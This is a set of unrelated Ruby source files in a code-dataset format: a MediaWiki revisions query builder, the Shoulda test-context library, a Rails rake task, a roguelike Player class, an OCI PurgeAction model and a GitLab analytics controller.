# Parse revision content (requires drvprop=content). For performance reasons, if this option is used, drvlimit is enforced to 1.
#
# @return [self]
def parse()
merge(drvparse: 'true')
end
# Only retrieve the content of this section number.
#
# @param value [String]
# @return [self]
def section(value)
merge(drvsection: value.to_s)
end
# Revision ID to diff each revision to. Use prev, next and cur for the previous, next and current revision respectively.
#
# @param value [String]
# @return [self]
def diffto(value)
merge(drvdiffto: value.to_s)
end
# Text to diff each revision to. Only diffs a limited number of revisions. Overrides drvdiffto. If drvsection is set, only that section will be diffed against this text.
#
# @param value [String]
# @return [self]
def difftotext(value)
merge(drvdifftotext: value.to_s)
end
# Perform a pre-save transform on the text before diffing it. Only valid when used with drvdifftotext.
#
# @return [self]
def difftotextpst()
merge(drvdifftotextpst: 'true')
end
# Serialization format used for drvdifftotext and expected for output of content.
#
# @param value [String] One of "application/json", "text/x-wiki", "text/javascript", "text/css", "text/plain", "application/vnd.php.serialized".
# @return [self]
def contentformat(value)
_contentformat(value) or fail ArgumentError, "Unknown value for contentformat: #{value}"
end
# @private
def _contentformat(value)
defined?(super) && super || ["application/json", "text/x-wiki", "text/javascript", "text/css", "text/plain", "application/vnd.php.serialized"].include?(value.to_s) && merge(drvcontentformat: value.to_s)
end
# The timestamp to start enumerating from. Ignored when processing a list of revision IDs.
#
# @param value [Time]
# @return [self]
def start(value)
merge(drvstart: value.iso8601)
end
# The timestamp to stop enumerating at. Ignored when processing a list of revision IDs.
#
# @param value [Time]
# @return [self]
def end(value)
merge(drvend: value.iso8601)
end
# In which direction to enumerate:
#
# @param value [String] One of "newer" (List oldest first. Note: drvstart has to be before drvend), "older" (List newest first (default). Note: drvstart has to be later than drvend).
# @return [self]
def dir(value)
_dir(value) or fail ArgumentError, "Unknown value for dir: #{value}"
end
# @private
def _dir(value)
defined?(super) && super || ["newer", "older"].include?(value.to_s) && merge(drvdir: value.to_s)
end
# Only list revisions tagged with this tag.
#
# @param value [String]
# @return [self]
def tag(value)
merge(drvtag: value.to_s)
end
# Only list revisions by this user.
#
# @param value [String]
# @return [self]
def user(value)
merge(drvuser: value.to_s)
end
# Don't list revisions by this user.
#
# @param value [String]
# @return [self]
def excludeuser(value)
merge(drvexcludeuser: value.to_s)
end
# When more results are available, use this to continue.
#
# @param value [String]
# @return [self]
def continue(value)
merge(drvcontinue: value.to_s)
end
end
end
end
| 36.217647 | 647 | 0.625305 |
391dd5075cb2cfd15946b3a7e12d9d76bc69bef5 | 14,022 | module Shoulda
module Context
class << self
attr_accessor :contexts
def contexts # :nodoc:
@contexts ||= []
end
def current_context # :nodoc:
self.contexts.last
end
def add_context(context) # :nodoc:
self.contexts.push(context)
end
def remove_context # :nodoc:
self.contexts.pop
end
end
module ClassMethods
# == Should statements
#
# Should statements are just syntactic sugar over normal Test::Unit test
# methods. A should block contains all the normal code and assertions
# you're used to seeing, with the added benefit that they can be wrapped
# inside context blocks (see below).
#
# === Example:
#
# class UserTest < Test::Unit::TestCase
#
# def setup
# @user = User.new("John", "Doe")
# end
#
# should "return its full name"
# assert_equal 'John Doe', @user.full_name
# end
#
# end
#
# ...will produce the following test:
# * <tt>"test: User should return its full name. "</tt>
#
      # Note: The part before <tt>should</tt> in the test name is gleaned from the name of the Test::Unit class.
#
      # Should statements can also take a Proc as a <tt>:before</tt> option. This proc runs after any
# parent context's setups but before the current context's setup.
#
# === Example:
#
# context "Some context" do
# setup { puts("I run after the :before proc") }
#
# should "run a :before proc", :before => lambda { puts("I run before the setup") } do
# assert true
# end
# end
#
# Should statements can also wrap matchers, making virtually any matcher
# usable in a macro style. The matcher's description is used to generate a
# test name and failure message, and the test will pass if the matcher
# matches the subject.
#
# === Example:
#
# should validate_presence_of(:first_name).with_message(/gotta be there/)
#
def should(name_or_matcher, options = {}, &blk)
if Shoulda::Context.current_context
Shoulda::Context.current_context.should(name_or_matcher, options, &blk)
else
context_name = self.name.gsub(/Test/, "") if self.name
context = Shoulda::Context::Context.new(context_name, self) do
should(name_or_matcher, options, &blk)
end
context.build
end
end
# Allows negative tests using matchers. The matcher's description is used
# to generate a test name and negative failure message, and the test will
# pass unless the matcher matches the subject.
#
# === Example:
#
# should_not set_the_flash
def should_not(matcher)
if Shoulda::Context.current_context
Shoulda::Context.current_context.should_not(matcher)
else
context_name = self.name.gsub(/Test/, "") if self.name
context = Shoulda::Context::Context.new(context_name, self) do
should_not(matcher)
end
context.build
end
end
# == Before statements
#
# Before statements are should statements that run before the current
# context's setup. These are especially useful when setting expectations.
#
# === Example:
#
# class UserControllerTest < Test::Unit::TestCase
# context "the index action" do
# setup do
# @users = [Factory(:user)]
# User.stubs(:find).returns(@users)
# end
#
# context "on GET" do
# setup { get :index }
#
# should respond_with(:success)
#
# # runs before "get :index"
# before_should "find all users" do
# User.expects(:find).with(:all).returns(@users)
# end
# end
# end
# end
def before_should(name, &blk)
should(name, :before => blk) { assert true }
end
# Just like should, but never runs, and instead prints an 'X' in the Test::Unit output.
def should_eventually(name, options = {}, &blk)
context_name = self.name.gsub(/Test/, "")
context = Shoulda::Context::Context.new(context_name, self) do
should_eventually(name, &blk)
end
context.build
end
# == Contexts
#
# A context block groups should statements under a common set of setup/teardown methods.
# Context blocks can be arbitrarily nested, and can do wonders for improving the maintainability
# and readability of your test code.
#
# A context block can contain setup, should, should_eventually, and teardown blocks.
#
# class UserTest < Test::Unit::TestCase
# context "A User instance" do
# setup do
# @user = User.find(:first)
# end
#
# should "return its full name"
# assert_equal 'John Doe', @user.full_name
# end
# end
# end
#
# This code will produce the method <tt>"test: A User instance should return its full name. "</tt>.
#
# Contexts may be nested. Nested contexts run their setup blocks from out to in before each
# should statement. They then run their teardown blocks from in to out after each should statement.
#
# class UserTest < Test::Unit::TestCase
# context "A User instance" do
# setup do
# @user = User.find(:first)
# end
#
# should "return its full name"
# assert_equal 'John Doe', @user.full_name
# end
#
# context "with a profile" do
# setup do
# @user.profile = Profile.find(:first)
# end
#
# should "return true when sent :has_profile?"
# assert @user.has_profile?
# end
# end
# end
# end
#
# This code will produce the following methods
# * <tt>"test: A User instance should return its full name. "</tt>
# * <tt>"test: A User instance with a profile should return true when sent :has_profile?. "</tt>
#
# <b>Just like should statements, a context block can exist next to normal <tt>def test_the_old_way; end</tt>
# tests</b>. This means you do not have to fully commit to the context/should syntax in a test file.
def context(name, &blk)
if Shoulda::Context.current_context
Shoulda::Context.current_context.context(name, &blk)
else
context = Shoulda::Context::Context.new(name, self, &blk)
context.build
end
end
# Returns the class being tested, as determined by the test class name.
#
# class UserTest; described_type; end
# # => User
def described_type
@described_type ||= self.name.
gsub(/Test$/, '').
split('::').
inject(Object) { |parent, local_name| parent.const_get(local_name) }
end
# Sets the return value of the subject instance method:
#
# class UserTest < Test::Unit::TestCase
# subject { User.first }
#
# # uses the existing user
# should validate_uniqueness_of(:email)
# end
def subject(&block)
@subject_block = block
end
def subject_block # :nodoc:
@subject_block
end
end
module InstanceMethods
# Returns an instance of the class under test.
#
# class UserTest
# should "be a user" do
# assert_kind_of User, subject # passes
# end
# end
#
# The subject can be explicitly set using the subject class method:
#
# class UserTest
# subject { User.first }
# should "be an existing user" do
# assert !subject.new_record? # uses the first user
# end
# end
#
# The subject is used by all macros that require an instance of the class
# being tested.
def subject
@shoulda_subject ||= construct_subject
end
def subject_block # :nodoc:
(@shoulda_context && @shoulda_context.subject_block) || self.class.subject_block
end
def get_instance_of(object_or_klass) # :nodoc:
if object_or_klass.is_a?(Class)
object_or_klass.new
else
object_or_klass
end
end
def instance_variable_name_for(klass) # :nodoc:
klass.to_s.split('::').last.underscore
end
private
def construct_subject
if subject_block
instance_eval(&subject_block)
else
get_instance_of(self.class.described_type)
end
end
end
class Context # :nodoc:
attr_accessor :name # my name
attr_accessor :parent # may be another context, or the original test::unit class.
attr_accessor :subcontexts # array of contexts nested under myself
attr_accessor :setup_blocks # blocks given via setup methods
attr_accessor :teardown_blocks # blocks given via teardown methods
attr_accessor :shoulds # array of hashes representing the should statements
attr_accessor :should_eventuallys # array of hashes representing the should eventually statements
attr_accessor :subject_block
def initialize(name, parent, &blk)
Shoulda::Context.add_context(self)
self.name = name
self.parent = parent
self.setup_blocks = []
self.teardown_blocks = []
self.shoulds = []
self.should_eventuallys = []
self.subcontexts = []
if block_given?
merge_block(&blk)
else
merge_block { warn " * WARNING: Block missing for context '#{full_name}'" }
end
Shoulda::Context.remove_context
end
def merge_block(&blk)
blk.bind(self).call
end
def context(name, &blk)
self.subcontexts << Context.new(name, self, &blk)
end
def setup(&blk)
self.setup_blocks << blk
end
def teardown(&blk)
self.teardown_blocks << blk
end
def should(name_or_matcher, options = {}, &blk)
if name_or_matcher.respond_to?(:description) && name_or_matcher.respond_to?(:matches?)
name = name_or_matcher.description
blk = lambda { assert_accepts name_or_matcher, subject }
else
name = name_or_matcher
end
if blk
self.shoulds << { :name => name, :before => options[:before], :block => blk }
else
self.should_eventuallys << { :name => name }
end
end
def should_not(matcher)
name = matcher.description
blk = lambda { assert_rejects matcher, subject }
self.shoulds << { :name => "not #{name}", :block => blk }
end
def should_eventually(name, &blk)
self.should_eventuallys << { :name => name, :block => blk }
end
def subject(&block)
self.subject_block = block
end
def subject_block
return @subject_block if @subject_block
parent.subject_block
end
def full_name
parent_name = parent.full_name if am_subcontext?
return [parent_name, name].join(" ").strip
end
def am_subcontext?
parent.is_a?(self.class) # my parent is the same class as myself.
end
def test_unit_class
am_subcontext? ? parent.test_unit_class : parent
end
def test_methods
@test_methods ||= Hash.new { |h,k|
h[k] = Hash[k.instance_methods.map { |n| [n, true] }]
}
end
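      # Defines a test method on the underlying Test::Unit class. The generated
      # method runs parent setups, the optional :before proc and the current
      # context's setups, then the should block, and always runs the teardowns.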
def create_test_from_should_hash(should)
test_name = ["test:", full_name, "should", "#{should[:name]}. "].flatten.join(' ').to_sym
if test_methods[test_unit_class][test_name.to_s] then
warn " * WARNING: '#{test_name}' is already defined"
end
test_methods[test_unit_class][test_name.to_s] = true
context = self
test_unit_class.send(:define_method, test_name) do
@shoulda_context = context
begin
context.run_parent_setup_blocks(self)
should[:before].bind(self).call if should[:before]
context.run_current_setup_blocks(self)
should[:block].bind(self).call
ensure
context.run_all_teardown_blocks(self)
end
end
end
def run_all_setup_blocks(binding)
run_parent_setup_blocks(binding)
run_current_setup_blocks(binding)
end
def run_parent_setup_blocks(binding)
self.parent.run_all_setup_blocks(binding) if am_subcontext?
end
def run_current_setup_blocks(binding)
setup_blocks.each do |setup_block|
setup_block.bind(binding).call
end
end
def run_all_teardown_blocks(binding)
teardown_blocks.reverse.each do |teardown_block|
teardown_block.bind(binding).call
end
self.parent.run_all_teardown_blocks(binding) if am_subcontext?
end
def print_should_eventuallys
should_eventuallys.each do |should|
test_name = [full_name, "should", "#{should[:name]}. "].flatten.join(' ')
puts " * DEFERRED: " + test_name
end
end
def build
shoulds.each do |should|
create_test_from_should_hash(should)
end
subcontexts.each { |context| context.build }
print_should_eventuallys
end
def method_missing(method, *args, &blk)
test_unit_class.send(method, *args, &blk)
end
end
end
end
| 31.090909 | 115 | 0.579874 |
bf0289f61547272d79ec881d74c1aba44a12ce21 | 490 | require File.join(Rails.root, "app", "data_migrations", "resolve_census_employee_validation_failures")
# This rake task removes the invalid benefit group assignments for the EEs (census employees)
# format: RAILS_ENV=production bundle exec rake migrations:resolve_census_employee_validation_failures
namespace :migrations do
desc "correcting the invalid benefit group assignmentsr"
ResolveCensusEmployeeValidationFailures.define_task :resolve_census_employee_validation_failures => :environment
end
| 61.25 | 114 | 0.85102 |
61bdcaa416a6a81e3f6375389107b51ca7c04a38 | 2,160 | require_relative 'unit'
require_relative 'skills/skill'
Dir[File.dirname(__FILE__) + '/skills/*.rb'].each do |s|
require_relative 'skills/' + File.basename(s, '.rb')
end
# class Player
# ------------
# methods and stats unique to just the player unit
class Player < Unit
attr_accessor :energy, :energy_per_turn, :block, :block_per_turn, :active_skill, :skills, :skillset
STARTING_ENERGY = 5 # energy points at the start of each level
ENERGY_PER_TURN = 1 # energy points to gain at the start of each round
ALL_SKILLS = [
AimedArrow, DefensiveStance, DisciplinedStrike, Fortify, LuckyPunch,
PoisonArrow, Pierce, ShieldBash, ShieldWall, SpearThrow, Rejuvenation,
TastySnack, AxeThrow
]
STARTING_SKILLS = [Pierce, DefensiveStance] # skills which the player starts with
def initialize
super(symbol: '@', name: 'Player', style: 'player')
@ap = 1 # basic AP for the player when not using skills
refresh
@skills = STARTING_SKILLS
@skillset = @skills.map(&:new)
@active_skill = nil
end
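  # Runs the shared Unit turn logic, then applies this turn's energy and block
  # regeneration.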
def process_turn
super(nil, nil, nil)
@energy += @energy_per_turn
@block += @block_per_turn
end
def refresh
@energy = STARTING_ENERGY
@energy_per_turn = ENERGY_PER_TURN
@block = 0
@block_per_turn = 0
end
def use_skill_on_self
skill = @active_skill
return 'No skill selected!' unless skill
if skill.cost > @energy
"Not enough energy to use #{skill.name}."
else
@energy -= skill.cost
skill.effect(self)
end
end
def take_dmg(dmg)
@block -= dmg
if @block < 0
@hp += @block
@block = 0
end
end
def heal(amount)
@hp += amount
@hp = MAX_HP if @hp > MAX_HP
end
def add_random_skill(floor)
new_skills = ALL_SKILLS.select do |skill|
# check if skill is already in the player's possession
# and is appropriate for the current floor
@skills.none? { |s| s == skill } && skill.new.floors.cover?(floor)
end
if new_skills.size == 0 # check if there are any skills left to add
''
else
@skills << new_skills.sample
'You have found a new skill!'
end
end
end | 25.714286 | 101 | 0.658796 |
0123f03d421a48d659dff3b948adffbdef03bd2b | 10,082 | # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
require_relative 'action'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Purge action for scheduled task.
class LogAnalytics::Models::PurgeAction < LogAnalytics::Models::Action
DATA_TYPE_ENUM = [
DATA_TYPE_LOG = 'LOG'.freeze,
DATA_TYPE_LOOKUP = 'LOOKUP'.freeze,
DATA_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# **[Required]** Purge query string.
# @return [String]
attr_accessor :query_string
# **[Required]** the type of the log data to be purged
# @return [String]
attr_reader :data_type
# **[Required]** The duration of data to be retained, which is used to
# calculate the timeDataEnded when the task fires.
# The value should be negative.
# Purge duration in ISO 8601 extended format as described in
# https://en.wikipedia.org/wiki/ISO_8601#Durations.
# The largest supported unit is D, e.g. -P365D (not -P1Y) or -P14D (not -P2W).
#
# @return [String]
attr_accessor :purge_duration
# **[Required]** the compartment OCID under which the data will be purged
# @return [String]
attr_accessor :purge_compartment_id
# if true, purge child compartments data
# @return [BOOLEAN]
attr_accessor :compartment_id_in_subtree
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'type': :'type',
'query_string': :'queryString',
'data_type': :'dataType',
'purge_duration': :'purgeDuration',
'purge_compartment_id': :'purgeCompartmentId',
'compartment_id_in_subtree': :'compartmentIdInSubtree'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'type': :'String',
'query_string': :'String',
'data_type': :'String',
'purge_duration': :'String',
'purge_compartment_id': :'String',
'compartment_id_in_subtree': :'BOOLEAN'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :query_string The value to assign to the {#query_string} property
# @option attributes [String] :data_type The value to assign to the {#data_type} property
# @option attributes [String] :purge_duration The value to assign to the {#purge_duration} property
# @option attributes [String] :purge_compartment_id The value to assign to the {#purge_compartment_id} property
# @option attributes [BOOLEAN] :compartment_id_in_subtree The value to assign to the {#compartment_id_in_subtree} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
attributes['type'] = 'PURGE'
super(attributes)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.query_string = attributes[:'queryString'] if attributes[:'queryString']
raise 'You cannot provide both :queryString and :query_string' if attributes.key?(:'queryString') && attributes.key?(:'query_string')
self.query_string = attributes[:'query_string'] if attributes[:'query_string']
self.data_type = attributes[:'dataType'] if attributes[:'dataType']
raise 'You cannot provide both :dataType and :data_type' if attributes.key?(:'dataType') && attributes.key?(:'data_type')
self.data_type = attributes[:'data_type'] if attributes[:'data_type']
self.purge_duration = attributes[:'purgeDuration'] if attributes[:'purgeDuration']
raise 'You cannot provide both :purgeDuration and :purge_duration' if attributes.key?(:'purgeDuration') && attributes.key?(:'purge_duration')
self.purge_duration = attributes[:'purge_duration'] if attributes[:'purge_duration']
self.purge_compartment_id = attributes[:'purgeCompartmentId'] if attributes[:'purgeCompartmentId']
raise 'You cannot provide both :purgeCompartmentId and :purge_compartment_id' if attributes.key?(:'purgeCompartmentId') && attributes.key?(:'purge_compartment_id')
self.purge_compartment_id = attributes[:'purge_compartment_id'] if attributes[:'purge_compartment_id']
self.compartment_id_in_subtree = attributes[:'compartmentIdInSubtree'] unless attributes[:'compartmentIdInSubtree'].nil?
self.compartment_id_in_subtree = false if compartment_id_in_subtree.nil? && !attributes.key?(:'compartmentIdInSubtree') # rubocop:disable Style/StringLiterals
raise 'You cannot provide both :compartmentIdInSubtree and :compartment_id_in_subtree' if attributes.key?(:'compartmentIdInSubtree') && attributes.key?(:'compartment_id_in_subtree')
self.compartment_id_in_subtree = attributes[:'compartment_id_in_subtree'] unless attributes[:'compartment_id_in_subtree'].nil?
self.compartment_id_in_subtree = false if compartment_id_in_subtree.nil? && !attributes.key?(:'compartmentIdInSubtree') && !attributes.key?(:'compartment_id_in_subtree') # rubocop:disable Style/StringLiterals
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] data_type Object to be assigned
def data_type=(data_type)
# rubocop:disable Style/ConditionalAssignment
if data_type && !DATA_TYPE_ENUM.include?(data_type)
OCI.logger.debug("Unknown value for 'data_type' [" + data_type + "]. Mapping to 'DATA_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@data_type = DATA_TYPE_UNKNOWN_ENUM_VALUE
else
@data_type = data_type
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
type == other.type &&
query_string == other.query_string &&
data_type == other.data_type &&
purge_duration == other.purge_duration &&
purge_compartment_id == other.purge_compartment_id &&
compartment_id_in_subtree == other.compartment_id_in_subtree
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[type, query_string, data_type, purge_duration, purge_compartment_id, compartment_id_in_subtree].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
          # check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 40.817814 | 245 | 0.694207 |
e8d0dd3dec470a5e43d042874bca1fcda8356593 | 1,518 | # frozen_string_literal: true
class Groups::ContributionAnalyticsController < Groups::ApplicationController
include Analytics::UniqueVisitsHelper
before_action :group
before_action :check_contribution_analytics_available!
before_action :authorize_read_contribution_analytics!
layout 'group'
track_unique_visits :show, target_id: 'g_analytics_contribution'
feature_category :planning_analytics
def show
@start_date = data_collector.from
respond_to do |format|
format.html
format.json do
render json: GroupAnalyticsSerializer
.new(data_collector: data_collector)
.represent(data_collector.users), status: :ok
end
end
end
private
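  # Memoizes the data collector for this group; the reporting window defaults
  # to the last week when no start_date param is supplied.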
def data_collector
@data_collector ||= Gitlab::ContributionAnalytics::DataCollector
.new(group: @group, from: params[:start_date] || 1.week.ago.to_date)
end
def check_contribution_analytics_available!
return if group_has_access_to_feature?
show_promotions? ? render_promotion : render_404
end
def authorize_read_contribution_analytics!
render_403 unless user_has_access_to_feature?
end
def render_promotion
render 'shared/promotions/_promote_contribution_analytics'
end
def show_promotions?
LicenseHelper.show_promotions?(current_user)
end
def group_has_access_to_feature?
@group.feature_available?(:contribution_analytics)
end
def user_has_access_to_feature?
can?(current_user, :read_group_contribution_analytics, @group)
end
end
| 24.483871 | 77 | 0.769433 |
7975a4455f3dae0e70c703f7feb8b2a382f40a0e | 175 | require File.dirname(__FILE__) + '/../test_helper'
class HostTest < ActiveSupport::TestCase
# Replace this with your real tests.
def test_truth
assert true
end
end
| 19.444444 | 50 | 0.731429 |